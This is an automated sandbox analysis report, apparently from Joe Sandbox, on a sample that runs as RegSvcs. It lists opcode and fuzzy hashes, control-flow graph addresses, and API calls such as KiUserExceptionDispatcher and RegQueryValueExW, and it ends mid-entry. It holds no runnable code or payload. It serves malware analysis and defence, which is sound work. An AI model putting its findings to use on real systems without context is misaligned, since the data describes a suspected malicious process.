                                                                                          • Opcode ID: 63681122da9172a3a0ebb88a17c2a5ade200314d6c38686ce6a2180c12e8155a
                                                                                          • Instruction ID: 61b761fcb80892da707bb81781044790b85fb8840d3bf9143ea58b117494a9ac
                                                                                          • Opcode Fuzzy Hash: 63681122da9172a3a0ebb88a17c2a5ade200314d6c38686ce6a2180c12e8155a
                                                                                          • Instruction Fuzzy Hash: D802BB38916228CFCB65EF34C9886D9F772BF49305F2089EAD40AA6750DB319E85CF51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 4094 28758c-2875f5 4238 2875f5 call 28b768 4094->4238 4239 2875f5 call 28b7b8 4094->4239 4240 2875f5 call 28ba08 4094->4240 4241 2875f5 call 28ba68 4094->4241 4242 2875f5 call 28b70e 4094->4242 4243 2875f5 call 28b720 4094->4243 4244 2875f5 call 28b967 4094->4244 4101 2875fb-28763a 4248 28763a call 28bb48 4101->4248 4249 28763a call 28c39e 4101->4249 4250 28763a call 28c790 4101->4250 4104 287640-28767f 4260 28767f call 812d10 4104->4260 4261 28767f call 812d02 4104->4261 4262 28767f call 812d6f 4104->4262 4107 287685-2876c4 4265 2876c4 call 812f12 4107->4265 4266 2876c4 call 812ec8 4107->4266 4110 2876ca-287700 4275 287700 call 813050 4110->4275 4276 287700 call 812ff0 4110->4276 4113 287706-287745 4287 287745 call 813857 4113->4287 4288 287745 call 8137f8 4113->4288 4289 287745 call 813748 4113->4289 4116 28774b-28778a 4295 28778a call 813977 4116->4295 4296 28778a call 8138b8 4116->4296 4297 28778a call 813918 4116->4297 4119 287790-2877cf 4302 2877cf call 813a97 4119->4302 4303 2877cf call 8139d8 4119->4303 4304 2877cf call 813a38 4119->4304 4122 2877d5-28789e 4312 28789e call 814390 4122->4312 4313 28789e call 81432e 4122->4313 4131 2878a4-287928 4318 287928 call 814820 4131->4318 4319 287928 call 814830 4131->4319 4320 287928 call 814927 4131->4320 4321 287928 call 8148c8 4131->4321 4137 28792e-2879c8 KiUserExceptionDispatcher 4251 2879c8 call 814da0 4137->4251 4252 2879c8 call 814ec7 4137->4252 4253 2879c8 call 814e68 4137->4253 4143 2879ce-287a0d 4263 287a0d call 814f29 4143->4263 4264 287a0d call 814f88 4143->4264 4146 287a13-287a97 4277 287a97 call 815490 4146->4277 4278 287a97 call 815659 4146->4278 4279 287a97 call 8152e8 4146->4279 4280 287a97 call 815348 4146->4280 4281 287a97 call 815758 4146->4281 4152 287a9d-287b21 4298 287b21 call 8165d0 4152->4298 4299 287b21 call 8165c8 4152->4299 4158 287b27-287bf6 4307 287bf6 call 817958 4158->4307 4308 287bf6 call 817aa8 4158->4308 4167 287bfc-287c3e 4314 287c3e call 817d98 4167->4314 4315 287c3e call 817da8 4167->4315 4170 287c44-287cc2 4233 287cc2 call 819668 4170->4233 4234 287cc2 call 8197b8 4170->4234 4235 287cc2 call 819718 4170->4235 4176 287cc8-287d52 call 819a40 4254 287d52 call 81a131 4176->4254 4255 287d52 call 81a320 4176->4255 4256 287d52 call 81a330 4176->4256 4257 287d52 call 81a379 4176->4257 4258 287d52 call 81a3c8 4176->4258 4259 287d52 call 819d88 4176->4259 4182 287d58-287dd6 4267 287dd6 call 81aed0 4182->4267 4268 287dd6 call 81ae20 4182->4268 4269 287dd6 call 81af2f 4182->4269 4188 287ddc-287e1e 4282 287e1e call 81af91 4188->4282 4283 287e1e call 81aff0 4188->4283 4191 287e24-287e66 4290 287e66 call 81af91 4191->4290 4291 287e66 call 81b410 4191->4291 4292 287e66 call 81aff0 4191->4292 4293 287e66 call 81b468 4191->4293 4294 287e66 call 81b3fd 4191->4294 4194 287e6c-287ea2 4300 287ea2 call 81b800 4194->4300 4301 287ea2 call 81b79b 4194->4301 4197 287ea8-287f26 4305 287f26 call 81ce50 4197->4305 4306 287f26 call 81ce4c 4197->4306 4203 287f2c-287f6e 4309 287f6e call 81e297 4203->4309 4310 287f6e call 81e238 4203->4310 4311 287f6e call 81dfa8 4203->4311 4206 287f74-287ffe 4316 287ffe call 81e5d0 4206->4316 4317 287ffe call 81e570 4206->4317 4212 288004-288046 4236 288046 call 81e998 4212->4236 4237 288046 call 81e9f8 4212->4237 4215 28804c-28808e 4246 28808e call 81ecc1 4215->4246 4247 28808e call 81ef30 4215->4247 4218 288094-28815a 4270 28815a call 81f6a0 4218->4270 4271 28815a call 81f192 4218->4271 4272 28815a call 81f977 4218->4272 4273 28815a call 81f198 4218->4273 4274 28815a call 81f8b8 4218->4274 4227 288160-2881a2 4284 2881a2 call 81fa97 4227->4284 4285 2881a2 call 81f9d8 4227->4285 4286 2881a2 call 81fa38 4227->4286 4230 2881a8-2881f7 4233->4176 4234->4176 4235->4176 4236->4215 4237->4215 4238->4101 4239->4101 4240->4101 4241->4101 4242->4101 4243->4101 4244->4101 4246->4218 4247->4218 4248->4104 4249->4104 4250->4104 4251->4143 4252->4143 4253->4143 4254->4182 4255->4182 4256->4182 4257->4182 4258->4182 4259->4182 4260->4107 4261->4107 4262->4107 4263->4146 4264->4146 4265->4110 4266->4110 4267->4188 4268->4188 4269->4188 4270->4227 4271->4227 4272->4227 4273->4227 4274->4227 4275->4113 4276->4113 4277->4152 4278->4152 4279->4152 4280->4152 4281->4152 4282->4191 4283->4191 4284->4230 4285->4230 4286->4230 4287->4116 4288->4116 4289->4116 4290->4194 4291->4194 4292->4194 4293->4194 4294->4194 4295->4119 4296->4119 4297->4119 4298->4158 4299->4158 4300->4197 4301->4197 4302->4122 4303->4122 4304->4122 4305->4203 4306->4203 4307->4167 4308->4167 4309->4206 4310->4206 4311->4206 4312->4131 4313->4131 4314->4170 4315->4170 4316->4212 4317->4212 4318->4137 4319->4137 4320->4137 4321->4137
                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 0028796D
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.1000981746.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_280000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: df40898d682ca499156ff83cba3a9627cc4d1b8b047c4cf3a3e176ae5c74aec3
                                                                                          • Instruction ID: 73f1cf4229dc7170fdb545c4873915ab5528064e44cd2730703cb6e649490b38
                                                                                          • Opcode Fuzzy Hash: df40898d682ca499156ff83cba3a9627cc4d1b8b047c4cf3a3e176ae5c74aec3
                                                                                          • Instruction Fuzzy Hash: 3A02BC38916228CFCB65EF74C9886D9F772BF49305F2089EAD40A96750DB319E85CF41
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 4322 2875d1-2875f5 4483 2875f5 call 28b768 4322->4483 4484 2875f5 call 28b7b8 4322->4484 4485 2875f5 call 28ba08 4322->4485 4486 2875f5 call 28ba68 4322->4486 4487 2875f5 call 28b70e 4322->4487 4488 2875f5 call 28b720 4322->4488 4489 2875f5 call 28b967 4322->4489 4326 2875fb-28763a 4493 28763a call 28bb48 4326->4493 4494 28763a call 28c39e 4326->4494 4495 28763a call 28c790 4326->4495 4329 287640-28767f 4505 28767f call 812d10 4329->4505 4506 28767f call 812d02 4329->4506 4507 28767f call 812d6f 4329->4507 4332 287685-2876c4 4510 2876c4 call 812f12 4332->4510 4511 2876c4 call 812ec8 4332->4511 4335 2876ca-287700 4520 287700 call 813050 4335->4520 4521 287700 call 812ff0 4335->4521 4338 287706-287745 4532 287745 call 813857 4338->4532 4533 287745 call 8137f8 4338->4533 4534 287745 call 813748 4338->4534 4341 28774b-28778a 4540 28778a call 813977 4341->4540 4541 28778a call 8138b8 4341->4541 4542 28778a call 813918 4341->4542 4344 287790-2877cf 4458 2877cf call 813a97 4344->4458 4459 2877cf call 8139d8 4344->4459 4460 2877cf call 813a38 4344->4460 4347 2877d5-28789e 4468 28789e call 814390 4347->4468 4469 28789e call 81432e 4347->4469 4356 2878a4-287928 4474 287928 call 814820 4356->4474 4475 287928 call 814830 4356->4475 4476 287928 call 814927 4356->4476 4477 287928 call 8148c8 4356->4477 4362 28792e-2879c8 KiUserExceptionDispatcher 4496 2879c8 call 814da0 4362->4496 4497 2879c8 call 814ec7 4362->4497 4498 2879c8 call 814e68 4362->4498 4368 2879ce-287a0d 4508 287a0d call 814f29 4368->4508 4509 287a0d call 814f88 4368->4509 4371 287a13-287a97 4522 287a97 call 815490 4371->4522 4523 287a97 call 815659 4371->4523 4524 287a97 call 8152e8 4371->4524 4525 287a97 call 815348 4371->4525 4526 287a97 call 815758 4371->4526 4377 287a9d-287b21 4543 287b21 call 8165d0 4377->4543 4544 287b21 call 8165c8 4377->4544 4383 287b27-287bf6 4463 287bf6 call 817958 4383->4463 4464 287bf6 call 817aa8 4383->4464 4392 287bfc-287c3e 4470 287c3e call 817d98 4392->4470 4471 287c3e call 817da8 4392->4471 4395 287c44-287cc2 4478 287cc2 call 819668 4395->4478 4479 287cc2 call 8197b8 4395->4479 4480 287cc2 call 819718 4395->4480 4401 287cc8-287d52 call 819a40 4499 287d52 call 81a131 4401->4499 4500 287d52 call 81a320 4401->4500 4501 287d52 call 81a330 4401->4501 4502 287d52 call 81a379 4401->4502 4503 287d52 call 81a3c8 4401->4503 4504 287d52 call 819d88 4401->4504 4407 287d58-287dd6 4512 287dd6 call 81aed0 4407->4512 4513 287dd6 call 81ae20 4407->4513 4514 287dd6 call 81af2f 4407->4514 4413 287ddc-287e1e 4527 287e1e call 81af91 4413->4527 4528 287e1e call 81aff0 4413->4528 4416 287e24-287e66 4535 287e66 call 81af91 4416->4535 4536 287e66 call 81b410 4416->4536 4537 287e66 call 81aff0 4416->4537 4538 287e66 call 81b468 4416->4538 4539 287e66 call 81b3fd 4416->4539 4419 287e6c-287ea2 4545 287ea2 call 81b800 4419->4545 4546 287ea2 call 81b79b 4419->4546 4422 287ea8-287f26 4461 287f26 call 81ce50 4422->4461 4462 287f26 call 81ce4c 4422->4462 4428 287f2c-287f6e 4465 287f6e call 81e297 4428->4465 4466 287f6e call 81e238 4428->4466 4467 287f6e call 81dfa8 4428->4467 4431 287f74-287ffe 4472 287ffe call 81e5d0 4431->4472 4473 287ffe call 81e570 4431->4473 4437 288004-288046 4481 288046 call 81e998 4437->4481 4482 288046 call 81e9f8 4437->4482 4440 28804c-28808e 4491 28808e call 81ecc1 4440->4491 4492 28808e call 81ef30 4440->4492 4443 288094-28815a 4515 28815a call 81f6a0 4443->4515 4516 28815a call 81f192 4443->4516 4517 28815a call 81f977 4443->4517 4518 28815a call 81f198 4443->4518 4519 28815a call 81f8b8 4443->4519 4452 288160-2881a2 4529 2881a2 call 81fa97 4452->4529 4530 2881a2 call 81f9d8 4452->4530 4531 2881a2 call 81fa38 4452->4531 4455 2881a8-2881f7 4458->4347 4459->4347 4460->4347 4461->4428 4462->4428 4463->4392 4464->4392 4465->4431 4466->4431 4467->4431 4468->4356 4469->4356 4470->4395 4471->4395 4472->4437 4473->4437 4474->4362 4475->4362 4476->4362 4477->4362 4478->4401 4479->4401 4480->4401 4481->4440 4482->4440 4483->4326 4484->4326 4485->4326 4486->4326 4487->4326 4488->4326 4489->4326 4491->4443 4492->4443 4493->4329 4494->4329 4495->4329 4496->4368 4497->4368 4498->4368 4499->4407 4500->4407 4501->4407 4502->4407 4503->4407 4504->4407 4505->4332 4506->4332 4507->4332 4508->4371 4509->4371 4510->4335 4511->4335 4512->4413 4513->4413 4514->4413 4515->4452 4516->4452 4517->4452 4518->4452 4519->4452 4520->4338 4521->4338 4522->4377 4523->4377 4524->4377 4525->4377 4526->4377 4527->4416 4528->4416 4529->4455 4530->4455 4531->4455 4532->4341 4533->4341 4534->4341 4535->4419 4536->4419 4537->4419 4538->4419 4539->4419 4540->4344 4541->4344 4542->4344 4543->4383 4544->4383 4545->4422 4546->4422
                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 0028796D
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.1000981746.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_280000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: d2c92e666f3015b325f22a10dfce34cbf7ff856d18677ffdbaf1d2c98c0532eb
                                                                                          • Instruction ID: 2ed479ddef95cd978ec002f2351b2127e062e83007ed9e98a8bbc2fba686aab2
                                                                                          • Opcode Fuzzy Hash: d2c92e666f3015b325f22a10dfce34cbf7ff856d18677ffdbaf1d2c98c0532eb
                                                                                          • Instruction Fuzzy Hash: 1102CB38916228CFCB65EF74C9886D9F772BF49305F2089EAD40AA6750DB319E85CF41
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 0028796D
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.1000981746.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_280000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 9a9586400bc4805c1f23b5b101c9c500f680f3fbdc0cd5d6d2efb7cfec1c3d30
                                                                                          • Instruction ID: d613300dccfdaa1b92f72ffc330758d5f5bbfcbefc56d318b449720a0e30ebd0
                                                                                          • Opcode Fuzzy Hash: 9a9586400bc4805c1f23b5b101c9c500f680f3fbdc0cd5d6d2efb7cfec1c3d30
                                                                                          • Instruction Fuzzy Hash: C4F1CB38916228CFCB65EF74C9886D9F772BF49305F2089EAD40AA6750DB319E85CF41
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 0028796D
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.1000981746.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_280000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: a2e852139e0fe5809f563e9b7e56d4ce830655b8b78fad824447a9b98d62766a
                                                                                          • Instruction ID: 03734a779092df46538da6cf2cd14972831e1e7a19c4ef5c0bb6cbf983f1877d
                                                                                          • Opcode Fuzzy Hash: a2e852139e0fe5809f563e9b7e56d4ce830655b8b78fad824447a9b98d62766a
                                                                                          • Instruction Fuzzy Hash: 41F1BB38916228CFCB65EF74C9886D9F772BF49305F2089EAD40AA6750DB319E85CF41
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 0028796D
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.1000981746.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_280000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 88a5768af0ff3003459573e1d75570da7ac3b0d283848ba982a01f53791a6716
                                                                                          • Instruction ID: b4ab5106c4c609bf638f38ea7410e9000b861224d5f04639559aa6924f737b90
                                                                                          • Opcode Fuzzy Hash: 88a5768af0ff3003459573e1d75570da7ac3b0d283848ba982a01f53791a6716
                                                                                          • Instruction Fuzzy Hash: D8F1BB38926228CFCB65EF74C9886D9F772BF49305F2089EAD40A96750DB319E85CF41
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 0028796D
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.1000981746.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_280000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 11446ee1e4afa8323d548b6693964297b27bbc79355de14297df4008cd926887
                                                                                          • Instruction ID: c6762ebd73912eab1e1db7cb7dbef767b634762e0586840191eade9fbf29c054
                                                                                          • Opcode Fuzzy Hash: 11446ee1e4afa8323d548b6693964297b27bbc79355de14297df4008cd926887
                                                                                          • Instruction Fuzzy Hash: 21F1CB38926228CFCB65EF74C9886D9F772BF49305F2089EAD40A96750DB319E85CF41
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 0028796D
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.1000981746.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_280000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 94210fd966c26bb1f40eb386aedd0d3f20437562ea553e35fb98ae546ba5a9c9
                                                                                          • Instruction ID: d5aca762c516cbc7908cef110278b09e091ec787293bdbb89b644c3b569b07c9
                                                                                          • Opcode Fuzzy Hash: 94210fd966c26bb1f40eb386aedd0d3f20437562ea553e35fb98ae546ba5a9c9
                                                                                          • Instruction Fuzzy Hash: 4BE1CC38916228CFCB65EF74C9886D9F772BF49305F2089EAD40A96750DB319E85CF41
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 0028796D
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.1000981746.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_280000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 2fba574e931d885ce85b1237e7dbf3527f4f0efc139d7f616b22f07c0ebd2c7d
                                                                                          • Instruction ID: 6fc009247660ba3c78a7a5e9e761dd1b4a62a3f00031eea3816399948e0e1d14
                                                                                          • Opcode Fuzzy Hash: 2fba574e931d885ce85b1237e7dbf3527f4f0efc139d7f616b22f07c0ebd2c7d
                                                                                          • Instruction Fuzzy Hash: F6E1BC38916228CFCB65EF74C9886D9F772BF49305F2089EAD40A96750DB319E85CF41
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 0028796D
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.1000981746.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_280000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: c17f2130bbdd70191cbe89ff8e8bc6a316e8a1250ae809915bbd12e1108a75ab
                                                                                          • Instruction ID: 8924f105f7dd6a07541225ea79ac81630dfec0820120412ddbb1b82550bf4206
                                                                                          • Opcode Fuzzy Hash: c17f2130bbdd70191cbe89ff8e8bc6a316e8a1250ae809915bbd12e1108a75ab
                                                                                          • Instruction Fuzzy Hash: 02E1CC38926228CFCB65EF74C9886D9F772BF49305F2089EAD40A96750DB319E85CF41
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 0028796D
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.1000981746.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_280000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 0ba3ab9b83070e1f7d4d3598618ecfddc0c5558ba014561452e600beab17b2be
                                                                                          • Instruction ID: 09baeb8259952d659a3d730d8ca49d36877a30a57d089af8b935aaf428a4b86d
                                                                                          • Opcode Fuzzy Hash: 0ba3ab9b83070e1f7d4d3598618ecfddc0c5558ba014561452e600beab17b2be
                                                                                          • Instruction Fuzzy Hash: 1AE1CC38926228CFCB65EF74C9886D9F772BF49305F2089EAD40A96750DB319E85CF41
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 0028796D
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.1000981746.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_280000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: f28d834e91971d3e0fb80a456b0009dbde025327364d5d8d06b594781745a6a2
                                                                                          • Instruction ID: dc2f144e304635b4e4fe94a63475b206fbfbfa11032592f8084d72c840d57a0a
                                                                                          • Opcode Fuzzy Hash: f28d834e91971d3e0fb80a456b0009dbde025327364d5d8d06b594781745a6a2
                                                                                          • Instruction Fuzzy Hash: A0D1CC38926228CFCB65EF74C988699F772BF49305F2089EAD40A96750DB319E85CF41
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 0028796D
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.1000981746.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_280000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: ab879e64922b3ea176ca7be461b0121e9fff64a5eb29c015766b560c5bb09bad
                                                                                          • Instruction ID: d2aee975d04cca8b6ffdbeb5ac660ba42fb96ad8b82a7da07b7179458f04d746
                                                                                          • Opcode Fuzzy Hash: ab879e64922b3ea176ca7be461b0121e9fff64a5eb29c015766b560c5bb09bad
                                                                                          • Instruction Fuzzy Hash: ABD1CC38926228CFCB65EF74C9886D9F772BF45305F2089EAD40AA6750DB319E85CF41
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 0028796D
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.1000981746.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_280000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 2af6943381e9dd39514980b15211feb11857a9734ebd6501de43fc607bcd51a9
                                                                                          • Instruction ID: 45613d61683ba7e2b93b0835f1e63c914f9ed9a2c51b86dac8d82a541e83c069
                                                                                          • Opcode Fuzzy Hash: 2af6943381e9dd39514980b15211feb11857a9734ebd6501de43fc607bcd51a9
                                                                                          • Instruction Fuzzy Hash: 92D1CD38926228CFCB65EF34C9886D9F772BF45305F2089EAD40A96750DB319E85CF41
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 0028796D
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.1000981746.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_280000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 378d62304775a261377b965f1268db1a38cf7af9e1bfed0890b3114cce2d00a3
                                                                                          • Instruction ID: 83ea42621c11d137107b4cefffc882f529ca300e0c484f81397433cce1138156
                                                                                          • Opcode Fuzzy Hash: 378d62304775a261377b965f1268db1a38cf7af9e1bfed0890b3114cce2d00a3
                                                                                          • Instruction Fuzzy Hash: 6CC1BA38926228CFCB65EF34C9886D9F772BF45305F2089EAD40AA6750DB359E85CF41
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 0028796D
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.1000981746.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_280000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 1b342fb7f48ed92faaead4ed58dcf97ca29a91bb5f5ac646914f237bd9aa7034
                                                                                          • Instruction ID: fa4ee4d3a9b2a3c82ad27c680fc0e0d11ee7b485dcc67f54387be951db614fbf
                                                                                          • Opcode Fuzzy Hash: 1b342fb7f48ed92faaead4ed58dcf97ca29a91bb5f5ac646914f237bd9aa7034
                                                                                          • Instruction Fuzzy Hash: 25C1B938926228CFCB65EF34C9886D9F772BF45305F2089EAD40AA6750DB359E85CF41
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 008136D1
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.1002381200.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_810000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: QueryValue
                                                                                          • String ID:
                                                                                          • API String ID: 3660427363-0
                                                                                          • Opcode ID: b1675ab016838d57981fcd5a18c17aa9516fadebbf02ce774c38b10b38c45b54
                                                                                          • Instruction ID: 0dd4299abf285d8bf9830e40d25d0c238eb8af312876dcc9163bca0d24c70e3a
                                                                                          • Opcode Fuzzy Hash: b1675ab016838d57981fcd5a18c17aa9516fadebbf02ce774c38b10b38c45b54
                                                                                          • Instruction Fuzzy Hash: 054112B0E002599FCB10CFA9D888ADEBBF9FF48304F15846AE818AB350D7349945CF91
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 008136D1
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.1002381200.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_810000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: QueryValue
                                                                                          • String ID:
                                                                                          • API String ID: 3660427363-0
                                                                                          • Opcode ID: df9980f09b68a571d8fd8f68c29e2b9cb84393f81d4607512dc763fdd67df471
                                                                                          • Instruction ID: 53510e66eda17f0f936a1fcad5db4e1c51aafa1f9dc5101a5b7630730c883733
                                                                                          • Opcode Fuzzy Hash: df9980f09b68a571d8fd8f68c29e2b9cb84393f81d4607512dc763fdd67df471
                                                                                          • Instruction Fuzzy Hash: D231D2B1D002589FCB10CF9AC884ADEBBF5FF48314F55842AE818AB350D7749945CF91
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.1002503375.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_b20000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b5acfc4a9bc4a1195686de8ae0856995629e81f575e2b45c9384f07bce1043c1
